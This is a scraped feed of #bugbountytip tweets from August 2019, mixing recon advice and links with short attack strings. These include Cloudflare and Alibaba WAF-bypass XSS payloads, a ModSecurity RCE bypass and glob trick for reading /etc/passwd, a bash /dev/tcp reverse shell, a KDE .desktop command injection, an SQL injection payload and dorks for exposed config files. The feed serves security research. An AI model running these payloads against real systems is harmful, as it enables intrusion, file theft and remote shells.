/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-17 20:41:53
4 ModSecurity { RCE } Detection Bypass 💥 { 1 }; ;+$u+cat+/etc$u/passwd$u { 2 }; ;+$u+cat+/etc$u/passwd+\# #BugBounty #BugBountyTip #WAF #infosec
John
@JohnH4X00R


2019-08-17 18:23:03
2 "Rather than scanning for vulnerabilities, we need to scan for interesting behaviours"... Excellent advice by @albinowax from an old gem, must read... https://t.co/9FPy2OnCBM #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-08-17 18:22:39
2 Bug Bounty Tip : Target Android Mobile Apps to get the Endpoints/Hostnames and Run PortScan -- #BugBounty #BugBountyTip #hackdoor
C1h2e1
@C1h2e11


2019-08-17 13:41:05
1 #BugBounty #bugbountytip Try to scan these sensitive files or add a header for a quick vulnerability scan https://t.co/ZuZ5xMEqmj
Ammar Amer
@cry__pto


2019-08-17 03:29:40
2 The two most important free resources on the net to learn how to detect & exploit open-redirect & evade WAFs. If you are serious about learning this vulnerability you should visit these sites. https://t.co/IgbCjfguvb https://t.co/dGFkRiy43A https://t.co/1R23RdPEDN #bugbountytip
Soroush Dalili
@irsdl


2019-08-16 21:46:24
3 After spending so much time, finally here it is: "𝗨𝗽𝗹𝗼𝗮𝗱𝗶𝗻𝗴 𝘄𝗲𝗯.𝗰𝗼𝗻𝗳𝗶𝗴 𝗳𝗼𝗿 𝗙𝘂𝗻 𝗮𝗻𝗱 𝗣𝗿𝗼𝗳𝗶𝘁 𝟮" https://t.co/L2XrRRfqU6 #appsec #FileUpload #pentest #bugbountytip https://t.co/O3jVp0TWVq
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-08-16 21:18:20
0 #burp, #bugbountytip,#bugbountytips Recon with BurpSuite. Only burp no extender. I like this way. https://t.co/siOc5UaDLf
SALTWRX
@SaltwrxLLC


2019-08-16 17:14:00
1 @AFSLabs For those looking to setup a droplet for doing reconnaissance. #bugbountytip
HackIsOn ®
@hackison


2019-08-16 14:45:08
0 [Sensitive Directories] intitle:"Index of" wp-config.php [Sensitive Directories] intitle:index.of./.sql [Pages Containing Login Portals] site:*/cgi-bin/login.html [Various Online Devices] inurl:ftp://ftp robots.txt #dorks #hacking #bugbountytip #bugbountytips #pentesting
Milind Purswani
@MilindPurswani


2019-08-16 14:28:52
0 Have been testing for SSRF bypass for more than 2 hours on 1 endpoint -> Read the policy -> turns out, the endpoint is OOS. "Read the docs man! Read the docs!" 😑😑 #bugbountytip
OWASP Amass
@owaspamass


2019-08-16 14:23:16
0 OWASP Amass Fact: If you use the '-include' flag to reduce sources during your enum, be sure to include one or more of the following for ASN info: networksdb, radb, robtex, shadowserver, teamcymru and/or umbrella #osint #recon #bugbounty #bugbountytip https://t.co/QWTftRbJKT
expl0itc0der
@vanshitmalhotra


2019-08-16 14:04:28
1 Bug Bounty Tips - Always Read The Source Code //<>// #BugBounty #BugBountyTip
vj0shii
@vj0shii


2019-08-16 12:30:00
0 Best laptop for Penetration Testing and Bug Bounty Hunting @Apple @Dell @ASUS_ROG #bugbountytip #Pentesting
Detectify
@detectify


2019-08-16 11:00:10
0 Improving WordPress plugin security from both attack and defense side. Guest blog by @padannewitz. #detectifycrowdsource #bugbountytip https://t.co/627leeeH6R
abdoul gadiri balde
@moodiAbdoul


2019-08-16 10:26:29
1 #bugbounty #bugbountytips #bugbountytip never think that you can find nothing , i hacked a company that have top hacker in 00:51:31 #togetherwehitharder
Fisher
@Regala_


2019-08-16 07:32:13
0 Beta testing for Scope Monitor has started 🥳🥳 #bugbounty #bugbountytip https://t.co/KREdPY8rJT

@saurinn_


2019-08-16 01:40:12
0 Anyone have a link for a tool to test for different kinds of tokens (Docker specially)? It has a GitHub repo #bugbountytip #bugbountytips #infosec
Mo'men Basel
@Momenbassel


2019-08-15 22:40:44
0 HTTP request headers can be a golden gem for finding vulnerabilities never miss tampering/adding these headers! https://t.co/SdDV656qa7 #BugBounty #bugbountytip #bugbountytips
Hussein Daher
@HusseiN98D


2019-08-15 22:05:06
7 A 2 year old RCE on a @Hacker0x01 program. Next post at 400 RT! ALSO: I'm interested in any security research team / pentest work (remote). If any company/team is interested about my services DM me :) #bugbounty #bugbountytips #bugbountytip #infosec https://t.co/S1BpVB2LWM
Spicy
@BlackSheepSpicy


2019-08-15 21:31:56
0 #bugbountytip brought this up in @thecybermentor 's stream chat last night but you can load line separated text files into burp suite's scope so you can literally paste sublist3r's output into a text file and chuck the entire scope into burp with just a few clicks #BugBounty
Daher Mohamed
@DaherMohamed4


2019-08-15 20:14:51
0 #BugBountyTip #BBTip If you have win10 and don't want/can't install linux, you can use this tut to have linux/ubuntu terminal on windows : https://t.co/ftDEbdjv8U Must have win10 64 bits
m0z
@LooseSecurity


2019-08-15 14:44:56
1 A lot of programmers seem to forget that POST parameters pose the exact same risks as GET parameters. POST-Based XSS POST-Based CSRF You can even get SQL Injection through POST parameters. It's obvious but some people only check GET parameters out of convenience. #bugbountytip
MRunal
@mrunal110


2019-08-15 10:10:41
4 I just published What is Server-Side Request Forgery (SSRF) and some proof of concept about SSRF. https://t.co/uaTPqB470R #bugs #bugbountytip #infosecurity #cybersecurity #responsibledisclosure #vulnerabilities
Alex Chapman
@ajxchapman


2019-08-15 08:45:26
1 When you get RCE/ Command Injection on a server, check the system uptime. This can reveal the (ab)use of containers and help clarify technical risk #bugbountytip learned from @erbbysam at #h1702
Hendrik
@hendrikvb


2019-08-14 21:29:12
0 #CSRF lesson of the day: IE11 does not properly handle #CORS checks on file URIs! #bugbountytip #vuln #infosec
lavernasec
@lavernasec


2019-08-14 14:38:00
0 Pwn an iPhone to bank $1m and Check Point gripes about WhatsApp privacy again https://t.co/fBUkEesuVv #bugbountytip #iphone #whatsapptips #privacy
{{ '127.0.0.1’}}
@shivam31200


2019-08-14 08:45:53
0 So when testing e-commerce websites always check the CMS. I found one e-commerce website using Magento, I ran a Magento scan and found critical paths #bugbounty #bugbountytip Noob https://t.co/BBBPNECcrw
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-14 00:19:08
2 </>Cloudflare skip filters, ~XSS Bypass via dot. <div style="background:url(/f#oo/;color:red/*/foo.jpg);">X #WAF #BugBounty #BugBountyTip #infosec
HackIsOn ®
@hackison


2019-08-13 20:17:42
2 Here is a video about the complete step by step installation procedure of latest #nmap 7.80. #hacking #kalilinux #linux #bugbountytip #bugbounty #penetrationtesting #pentesting #windows #redteam 🔴 LINK: https://t.co/8FTl0sOOgT
Vail
@Vail_302


2019-08-13 19:41:01
0 I am still new to #bugbounty , however, if this can help anyone else, I built a cherrytree template to help with organization of targets. Any tips on making it better, let me know. #bugbountytip https://t.co/Ew4mIgsFiu
MRunal
@mrunal110


2019-08-13 18:35:46
0 I Published open-redirect-vulnerability blog https://t.co/tZezs6hMUN #bugs #bugbountytip #infosecurity #cybersecurity
ADM|N|STRAT0R
@strat0r


2019-08-13 17:54:39
0 You can use https://t.co/5wzwWvgY36 or google cache to peek at the landing page for public GitHub repos that have been taken offline ;) #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-08-13 16:14:40
1 Amazon EBS snapshots exposed publicly leaking sensitive data in hundreds of thousands, security analyst reveals at DefCon 27 #BugBounty #BugBountyTip #devops #devsecops #penetrationtesting #pentesting #aws #cloud #security #cloudsecurity https://t.co/E0M5006vhc
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-13 12:52:25
0 Bug bounty is a project designed to stop hackers and to learn the techniques and methods of hackers. { fucking mercenaries }; #BugBounty #BugBountyTip #WAF #infosec
Fisher
@Regala_


2019-08-13 08:54:07
1 Bounty hunters: how do you organize your notes on targets, especially when switching targets back and forth and doing it for a long time? A thread 👇👇👇 #bugbounty #bugbountytip
GarimaShares
@GarimaBhaskar


2019-08-13 06:50:02
0 Apple is Offering a Bug Bounty of $1 Million If You Can Hack An iPhone https://t.co/nea8djOCnK #Apple #appledaily #applenews #AppleEvent #bugbountytip #MiLLiONS #technews #technologynews #hacking #Hackers #TechTrends #bloggerstribe #blogger #blogpost #garimashares #iOS #macOS https://t.co/Lk3P2YJyt8
mr_nyx
@mr_nyxs


2019-08-12 21:33:27
0 If you have a shop system or any other buying system, you should try intercepting both requests and responses and change the prices in both of them, you might find yourself paying only $5 instead of $1000 #BugBountyTip #BugBounty #parameter_tampering
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-12 20:09:34
0 109 Payloads {URL} for #Hackerone_Programs #DOD #Private_Programs #Public_Programs #bugbounty #recon #bugbountytip https://t.co/e8Tm8nwz2B
Mufeed VH
@mufeedvh


2019-08-12 16:52:00
1 sector:443 CTF Walkthrough: https://t.co/0BWhT2HYFj #ctf #capturetheflag #bugbounty #bugbountytip #bugbountytips
lavernasec
@lavernasec


2019-08-12 14:38:00
0 Apple will now pay hackers up to $1 million for reporting vulnerabilities https://t.co/kYH14KVkB9 #bugbountytip #Apple #vulnerabilities
Ammar Amer
@cry__pto


2019-08-12 12:01:33
2 OPEN REDIRECTS is a dangerous web application vulnerability that should not be ignored by the security team/bug bounty hunters. This vulnerability may lead to installing malware/phishing attacks, and at least the loss of reputation and clients. #bugbountytip
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-12 11:38:33
0 #Verizon - CORS Vulnerability Leads to Information Disclosure (Critical Impact) #BugBounty #BugBountyTip #CORS https://t.co/zDzL0gjDK9
Wladimir Palant
@WPalant


2019-08-12 09:06:09
2 I tried producing some useful instructions for less experienced people to recognize flaws in password managers. Let me know whether it worked! #infosec #crypto #passwords #bugbounty #bugbountytip https://t.co/WTm5SDpTi9
Ameen
@ameenmaali


2019-08-12 06:48:12
3 #bugbountytip: Duplicating params, headers, etc can be useful for bypasses. i.e., file upload filters can potentially be bypassed by setting Content-Type twice (once for unallowed type and once for allowed). Authorization protection could be bypassed w/ the same method #bugbounty
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-10 15:55:30
1 Finding was closed, no return. @YoncuBilisim #WAF #BugBounty #BugBountyTip #infosec https://t.co/eoVvedJriy
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-10 15:52:25
0 { Cloudflare }; ~ XSS Bypass: 🦍 </Scrpt/"%27--!>%20<Scrpt>%20confirm(1)%20</Scrpt> #BugBounty #WAF #BugBountyTip #infosec
[email protected]:~$ sud¤ rm -r /*
@IAMPROPERSAM


2019-08-10 12:15:05
0 I and so many others out there definitely need this... Thanks man. #bugbountytip #bugbountytips https://t.co/wUNiL9k1t7
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-10 06:05:19
3 [ HTML Rich Text XSS Payload ] <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">hackerb0y</button> #BugBounty #BugBountyTip #infosec
Aziz Hakim
@hackerb0y_


2019-08-10 05:48:46
1 [ HTML Rich Text XSS Payload ] <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">hackerb0y</button> #infosec #bugbountytips #bugbountytip #bugbounty #xss
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-10 05:29:43
0 13 Hours ~ Fullstack Bug Bounty Programs H1 - 5 Reports Triaged Bugcrowd - 1 Triaged Yeswehack - 4 Triaged Graphql SQL-Injections / CORS / Blind SQL #BugBounty #BugBountytip #13hours #livehacks https://t.co/odsYNkdX2A
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-10 01:31:17
1 Graphql Api Leads to SQL - Injections #graphql #bugbounty #bugbountytip #bugbountytips https://t.co/lFNawsyPA5
Securisec 🚀
@securisec


2019-08-09 22:46:15
0 "RT RT zer0pwn: Bruteforce subdomains from browser (thanks to Marzavec). Works by using DNS over HTTP for resolution. https://t.co/5f2PjHvwNE #security #bugbounty #bugbountytip #security #redteam #osint #discovery https://t.co/1poKJWd4FW"
Arif Khan
@payloadartist


2019-08-09 20:15:13
0 I earned $1,500 for my submission on @bugcrowd #ItTakesACrowd #bugbountytip: Recon is the key to low hanging fruits with great impact! https://t.co/7of1OAuwxa
Guilherme Keerok
@k33r0k


2019-08-09 19:47:55
1 another Cloudflare bypass: <iframe/src=javascript:%2520with(document)with(body)innerHTML="<svg/onload"%2B"=alert\x28\x29\x3e"> #bugbountytip #bugbounty #xss #bugbountytips
expl0itc0der
@vanshitmalhotra


2019-08-09 19:19:28
0 If you have found an XSS on https://t.co/hykP1iWSJZ, find pages running this code on https://t.co/bveLMweNqR : document.domain="https://t.co/dLs7d73fmn " It results in: XSS on A > XSS on B as SOP allows https://t.co/hykP1iWSJZ to access https://t.co/bveLMweNqR #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-08-09 19:07:47
0 Cryptographic Attacks: A Guide for the Perplexed https://t.co/tRqja9L8pA Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt Youtube - https://t.co/42lWP1DIW0 #BugBounty #bugBountyTip
expl0itc0der
@vanshitmalhotra


2019-08-09 19:06:10
3 One Misconfig (JIRA) to Leak Them All- Including NASA and Hundreds of Fortune 500 Companies! https://t.co/k6aYmRDj1e Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt Twitter - https://t.co/KupiQVo8ex Youtube - https://t.co/42lWP1DIW0 #BugBounty #bugBountyTip
intigriti
@intigriti


2019-08-09 12:08:03
4 Doing recon? Don't forget the company resources! Slides, tutorials and other examples often contain a lot of juicy information! 👀Thanks for the #BugBountyTip, @Alyssa_Herrera_! #HackWithIntigriti https://t.co/CT1UYBZefH
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-09 09:51:11
1 #blindrce turn it in to a { reverse shell! } 👁️ |`bash -i >& /dev/tcp/yourip/yourport 0>&1` #bugbounty #bugbountytip #waf #infosec
Ennio Campagna
@EnnioCamp


2019-08-09 08:36:10
0 Got excited this morning, just entered in the @CERTEU Hall of Fame, thank you to the #securityteam for the fast response! #bugbounty #bugbountytip perseverance is the key of success
Yassine Aboukir @ DefCon/H1-702
@Yassineaboukir


2019-08-08 20:46:55
0 Cheers to @NahamSec for featuring [ASNLookup](https://t.co/wGiLKKnvCb) tool in his latest stream about techniques to enumerate more assets leveraging Yahoo's ASN as a target example. Check it out! https://t.co/PcoHujPdsV #bugbountytip
Ameen
@ameenmaali


2019-08-08 20:12:30
2 Testing authorization/access controls with a numeric ID? Try decimals/floats and round to the number you want to access. Example: admin role ID is 1 Try to set your ID to 0.9 and it may bypass the auth check as system will round up after auth check #bugbountytip #bugbounty
Dominik
@zer0pwn


2019-08-08 17:24:08
11 Bruteforce subdomains from browser (thanks to Marzavec). Works by using DNS over HTTP for resolution. https://t.co/L0P5wVuwFD #security #bugbounty #bugbountytip #security #redteam #osint #discovery https://t.co/lxygQ8RqSK
gujjuboy10x00
@vis_hacker


2019-08-08 15:30:21
1 awesome git recon for bug hunters specially for newbie @Bugcrowd #ItTakesACrowd #bugbountytip https://t.co/I1r38Ms06X
Spicy
@BlackSheepSpicy


2019-08-08 15:26:51
0 #bugbountytip web server being annoying and 302ing your gobuster? use the wildcard flag and pipe the output thru an inverted grep expression #bugbounty https://t.co/KGeBLCvVzf
artofbugbounty
@artofbugbounty


2019-08-08 15:08:15
0 Not Your Typical Base64 Encoded Data! #bugbountytip https://t.co/pzvYvpzUm6 https://t.co/akZueVxv7o
A DNF 🦖
@binb4sh


2019-08-08 10:47:40
0 If you have found an XSS on https://t.co/N5KFrxiY6l ,Find pages running this code on https://t.co/qV8UvGQ3nY : document.domain="https://t.co/2KVRowDP4i" It results in: XSS on A > XSS on B as SOP allows https://t.co/N5KFrxiY6l to access https://t.co/qV8UvGQ3nY #bugbountytip
Aashish Yadav
@aa5h15h


2019-08-08 10:26:05
1 Listed In Mozilla HOF https://t.co/hjvZ92kFOj #bugbounty #bugbountytip #webdev #mozilla #firefox #hackerone #bugcrowd #linux #unix #malware @mozilla
Mantis
@MantisSTS


2019-08-08 07:54:08
1 This should come in useful to some! #BugBounty #bugbountytip https://t.co/3jjJ8PrB2c
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-08 07:01:47
0 Paypal Bug Bounty 2019 - Exploiting HTML Injections https://t.co/EvfnAj5QmI #Paypal #BugBounty #BugBountyTip
Benson M
@Benson_Mwaura


2019-08-08 05:00:00
0 🛡️ Discover How Do Bug Bounties Fit Into The Software Development Lifecycle (#infographic 🎨 @Hacker0x01 ) @Fisher85M @pierrepinna @Shirastweet @CLAVDIAmartin @marcoessomba @ggithaiga #Cybersecurity #SecOps #DevOps #CISO #Cloudsec #Infosecurity #bugbountytip #bountyprogram https://t.co/TmRTGB8Mhv
Sanju
@sanjeethboddi


2019-08-08 02:45:12
0 @Amazon If you say simple "another" to the Alexa. It tells you a joke, which doesn't make any sense. You need to fix your NLP/NLG and make you have a proper dialogue flow. #bugbountytip #bugreport #alexa #amazonalexa #nlp #nlg
vavkamil
@vavkamil


2019-08-07 20:21:10
1 XFFenum ~ A simple tool to bypass 403 forbidden end-points behind load balancers (Cloudflare) based on X-Forwarded-For header #bugbounty #bugbountytip https://t.co/BR0X8TlGfT
Sajibe Kanti
@Sajibekantibd


2019-08-07 20:04:45
0 Some Time Check Cookies when Testing PHP based Web Pentest . Maybe You will get Password & user id on Cookies ;) #bugbountytip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-07 19:58:38
0 Reading { #passwd }, and other files. 🐧 /***/[c][a]* /**[c]/*****[d] {/???/??t,/**[c]/*****[d]} /***/??t /**[c]/*****[d] /***[n]/??t /??[c]/?????[d] #WAF #BugBounty #BugBountyTip #infosec
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-08-07 19:01:41
0 #bugbountytip #bugbountytips Path: target/worker Yesterday my report Worker Loop Admin panel Noswag, nobounty, nothing Only thanks from owner :) sometime I am kind :) https://t.co/6yIqsMpfU6
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-07 16:51:53
0 XSS { Cloudflare } bypass: 🔭 </> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " </> #WAF #BugBounty #BugBountyTip #infosec
intigriti
@intigriti


2019-08-07 16:51:01
0 Got a question? Follow @codingo_'s advice to get help faster! #BugBountyTip https://t.co/pkmcXReL9P
expl0itc0der
@vanshitmalhotra


2019-08-07 16:23:29
2 Security through obscurity works against scanners -- Agree/Disagree ?? #BugBounty #BugBountytip #penetrationtesting #pentesting #hacking #devops #devsecops
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-07 13:20:11
13 XSS { Cloudflare } bypass: 🔭 </> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " </> #WAF #BugBounty #BugBountyTip #infosec
Pavandeep
@Pavandep8


2019-08-07 13:13:18
0 Look what I shared: An introduction to Stack Buffer Overflows - #Hacking #hacker #Security #bugbountytip #BugBounty @MIUI| https://t.co/hM2ysqlhmI
expl0itc0der
@vanshitmalhotra


2019-08-07 12:46:03
0 https://t.co/X7i6Q9BLRA - SEARCH FOR LEAKS Search for Twitter users leaks #OSINT #recon #bugbounty #bugbountytip
Ammar Amer
@cry__pto


2019-08-07 11:52:48
2 go ahead and get those awesome free udemy courses for a limited time about python,hacking,ceh,networking,cybersecurity. 18 awesome course for a limited time. may the offer will end after 6 hours. so please share the post. #Hacking #pentest #bugbountytip #infosec #osint https://t.co/Gfiei78NO7
miraitowa
@miraitowa1


2019-08-07 10:25:53
0 Mahmoud Gamal - Security Blogs: Exploiting Out Of Band XXE using internal network ... https://t.co/CgGJMGZWfT #Bugbounty #bugbountytip #XXE
Hilary Sylar
@bit3c0de


2019-08-07 08:57:12
0 In honour of the best XSS tool out here, i wrote a small post about it. Simple and to the point. Great success with it and thought i'd share. https://t.co/UtvkJ3XFu0 #BugBounty #bugbountytip #pentest #xss #knoxss Thanks for the tool @brutelogic .
Mo'men Basel
@Momenbassel


2019-08-07 06:24:37
3 #bugbountytip: install keyFinder at your browser(https://t.co/TqSwU28eb4) --> surf the web --> go to results --> check API key at https://t.co/S3jRAYOEZp #BugBounty #bugbountytips #BugbountyProTip https://t.co/s0uGltinAD
expl0itc0der
@vanshitmalhotra


2019-08-06 20:53:06
0 Any script/one line command on aws cli to quickly get the list of permissions enabled for s3 bucket ? @awscloud #bugbounty #bugbountytip Command - aws s3api get-bucket-acl --bucket bucketname
Pepipost
@pepi_post


2019-08-06 18:27:35
0 Are your emails really reaching Inbox? Find out in this free Email Health Report. Click here : https://t.co/Qr4QcFTjbi #bugbountytip #smtp https://t.co/2U7otQsTLZ
Pepipost
@pepi_post


2019-08-06 16:39:14
1 Is there a way to validate email addresses using #javascript? Lets find out - how!👉 #bugbountytip https://t.co/9FBQD6PGOH
Ammar Amer
@cry__pto


2019-08-06 15:02:59
1 in the 19 chapter of the Real-world Bug Hunting by @yaworsk you will get a useful and detailed chapter about target RECONNAISSANCE and testing the application in an efficient and practical way. again the book is highly recommended. you can find the book at amazon #bugbountytip https://t.co/fPMrQyktZJ
Dhamu
@Dhamuharker


2019-08-06 14:50:27
1 #bugbountytips #BugBounty #bugbountytip #ItTakesACrowd #TogetherWeHitHarder XSS to RCE https://t.co/6YM2sk2j9Z
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-06 13:21:38
2 Bypass 405 Alibaba { WAF }; 🐞 with onloadstart/end and encode the parenthesis, /* <audio src=1 onloadstart=alert(1)//> */ #WAF #BugBounty #BugBountyTip #infosec
miraitowa
@miraitowa1


2019-08-06 13:02:37
3 Recon — my way. by @ehsahil https://t.co/5sLBmHqhM8 #bugbounty #bugbountytip #recon
expl0itc0der
@vanshitmalhotra


2019-08-06 12:39:44
0 #Subfinder - Installation and Usage - #hackdoor #bugbounty #tutorial #bugbountytip https://t.co/gQgX9bc4ab
expl0itc0der
@vanshitmalhotra


2019-08-06 12:17:42
1 #Sublister - Installation And Usage Tutorial #bugbounty #bugbountytip #hackdoor https://t.co/hp38xeL37x
expl0itc0der
@vanshitmalhotra


2019-08-06 12:13:31
1 #OWASP #JuiceShop - Challenge / SQL Injection Tutorial #hackdoor #devops #devsecops #bugbounty #bugbountytip https://t.co/N4vjkRujJj
Pepipost
@pepi_post


2019-08-06 09:31:48
3 Send email from website using #javascript #bugbountytip https://t.co/MIzaxCbzXt
Pepipost
@pepi_post


2019-08-06 09:24:59
1 Send email to multiple recipients using AddAddress() in #phpmailer #bugbountytip https://t.co/7JklR843zt
bayani elogada
@metamudkip


2019-08-06 02:33:37
0 The lack of Access-allow-* headers disable CORS on Javascript, but not Postman. Not really a #bugbountytip but oh well
Konark Modi
@konarkmodi


2019-08-05 22:24:15
0 As always a brilliant finding by @logicbomb_1 . Btw, apart from google dork queries you can also use Common Crawl Index to increase your coverage. Example: ``` curl -sX GET "https://t.co/7l4F17TQKh" | jq -r .url | sort -u | cut -d'/' -f3 | sort | uniq ``` #bugbountytip https://t.co/MnOLHGtEg2
Dominik
@zer0pwn


2019-08-05 17:42:05
10 KDE 4/5 KDesktopFile (.desktop) Command Injection. Fits in a tweet. [Desktop Entry] Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&) https://t.co/Iy3UPrSuhE #redteam #0day #security #bugbounty #bugbountytip #bugbountytips #kde #rce #zerodotlol #zerolol https://t.co/QRtX9Kwd1w
Petko D. Petkov
@pdp


2019-08-05 17:40:15
0 Before running you’ve got to warm up. Before public speaking you’ve got to warm up. But I’ve rarely seen anyone consciously taking steps to warm up before hacking. How is this any different? To get good results you need to make sure your mind is in the right state. #bugbountytip
intigriti
@intigriti


2019-08-05 14:26:22
8 According to @itscachemoney, this sometimes leads to account takeover vulnerabilities. 🤯#BugBountyTip #HackWithIntigriti https://t.co/jQ84SF3tdq
Ammar Amer
@cry__pto


2019-08-05 08:00:11
1 have questions about hacking? ask the questions in the comment section. I will help you. #bugbountytip #hacking #redteam #osint #cybersecurity #infosec
Dominik
@zer0pwn


2019-08-05 03:56:03
0 KDE 4/5 KDesktopFile Command Injection. Fits in a tweet. [Desktop Entry] Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&) https://t.co/Iy3UPrSuhE #redteam #0day #security #bugbounty #bugbountytip #bugbountytips #kde #rce #zerodotlol #zerolol https://t.co/Z49mw6rLni
Ennio Campagna
@EnnioCamp


2019-08-04 22:10:09
0 Great stream @NahamSec, every time i learn something new from your streaming 🙏 #bugbountytip #recon
Fisher
@Regala_


2019-08-04 18:22:18
2 Mediocre hunters: fuck there is no way there is a bug on this long standing hardened target Pro hunters: pretty sure there's a bug here somewhere #bugbounty #bugbountytip
Konark Modi
@konarkmodi


2019-08-04 17:25:14
2 If you are testing access to S3 buckets and do not want to configure credentials for testing use --no-sign-request. 'aws s3 command S3://bucket/file --no-sign-request' #bugbountytip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-04 13:46:58
1 CloudFlare { XSS } Bypass Payload via dot: 🐞 <--`<img/src=` onerror=confirm``> --!> #WAF #BugBounty #BugBountyTip #infosec
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-04 10:19:52
3 Exactly this 🕵️‍♂️ #WAF #BugBounty #BugBountyTip #infosec https://t.co/RPfTOEfvU9
Guilherme Keerok
@k33r0k


2019-08-04 01:29:45
1 XSS Cloudflare WAF bypass: <img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> #bugBounty #bugbountytip
Ammar Amer
@cry__pto


2019-08-04 00:26:41
3 you can use this tool to dynamically generate your own security (XSS,SQLI,email-format,etc,) payloads for fuzz testing: https://t.co/tONSfTriWq example: echo "<script>alert(1)</script>" | radamsa -n 5 --patterns od #bugbountytip #bugbounty #Hacking #pentest
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-03 21:58:27
0 SQL WAF-Fail2Ban Payload via dot 👾 (SELECT 6037 FROM(SELECT COUNT(*),CONCAT(0x7176706b71,(SELECT (ELT(6037=6037,1))),0x717a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) #WAF #BugBounty #BugBountyTip #infosec
Ammar Amer
@cry__pto


2019-08-03 21:02:35
1 you should not depend only on one tool to get the job done, you should always use 3 or 4 tools to make sure that you get the required/true results. this applies to all hacking stages, like osint & scanning, etc. #bugbountytip #osint #Hacking
𝓚𝓮𝓷𝓪𝓷
@h1_kenan


2019-08-03 18:46:27
0 Gaining Shell using Server Side Template Injection (SSTI) by @davidvalles007 #bugbountytip https://t.co/07uhXW7Hza
SECARMY
@secarmyofficial


2019-08-03 18:40:30
1 😱Hurry Join Book Your Seats Now 💢For Web App Pentesting Training 🌀Tomorrow Is Last Day Sign up to below link🔗 https://t.co/9EPBgaPB5R #Hackers #HackerSummerCamp #HackLearning #bugbounty #bugbountytip #WebApp https://t.co/DBocFwUbUD
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-03 17:48:25
0 XSS { Cloudflare } bypass: 👾 <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> #WAF #BugBounty #BugBountyTip #infosec
Random Robbie
@Random_Robbie


2019-08-03 13:18:26
6 #bugbountytip - Got a LFI on a php app.... Check for sessions at /var/lib/php/session Should be easy account takeover from there :D
expl0itc0der
@vanshitmalhotra


2019-08-03 09:49:14
0 Any script/one line command on aws cli to quickly get the list of permissions enabled for s3 bucket ? @awscloud #bugbounty #bugbountytip Command - aws s3api get-bucket-acl --bucket bucketname
Ennio Campagna
@EnnioCamp


2019-08-03 06:34:31
0 New entry!! Time to #learn ! #bugbounty #bugbountytip https://t.co/ha26xRNaET
XRSI
@XRSIdotorg


2019-08-02 18:58:40
0 Trust, Privacy and Safety will define the success of XR Technologies. Thts why #XRSI is in conversations wth industry leaders to roll out a dedicated #XR #bugbounty program, so we stay ahead of the bad guys : https://t.co/jsB7Zd2Aop. #BugBountyTip #appsec #AR #VR @ReadyHackerOne https://t.co/esWcitsv16
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-02 18:39:19
0 How do I open a report that has been closed by @Hacker0x01 ? but, give an impact and a very clear explanation, to open your report and become Triaged #BugBounty #BugBountyTip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-02 16:27:45
1 Network ~javascript execution payload: { <body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> } #WAF #BugBounty #BugBountyTip #infosec
Detectify
@detectify


2019-08-02 15:11:43
2 New blog from Crowdsource hacker @gwendallecoguic: A tutorial on bypassing Cloudflare WAF with the origin server IP address. #bugbountytip https://t.co/HvSq0iBkk9

@pouyana1


2019-08-02 11:47:12
1 A bug on the printer and this is the result 😁: #BugBountyTip #bugbounty #hacking #hack https://t.co/pd2ekxbTkf
Petko D. Petkov
@pdp


2019-08-02 11:08:00
1 Devious bug bounty tip: setup your own bug bounty program on @Hacker0x01 with solid rewards. Monitor what other hackers are doing and reflect to your targets. Muhaha #bugbountytip
emir c a
@emirca_


2019-08-02 10:32:28
0 Should we test only websites which has vulnerability bounty programs or test every possible website as we can and inform the companies? #BugBountyTip #BugBounty
Malav Sharma (Wolfdroid)
@ShMalav


2019-08-02 04:32:57
1 #bugbountytip Some people made it quite early , some took a lot of time …. but eventually they all made it … Its just about your curiosity and hard work and most important keep doing it .. never leave the field
Mo'men Basel
@Momenbassel


2019-08-02 02:57:09
0 pyRobots: a tool that reads "robots.txt" file and appends each path to the domain/subdomain you entered. https://t.co/S8hs6cdXxF #bugbountytips #python #BugBounty #BugBountyTip https://t.co/yeLvkcCUeo
Pavandeep
@Pavandep8


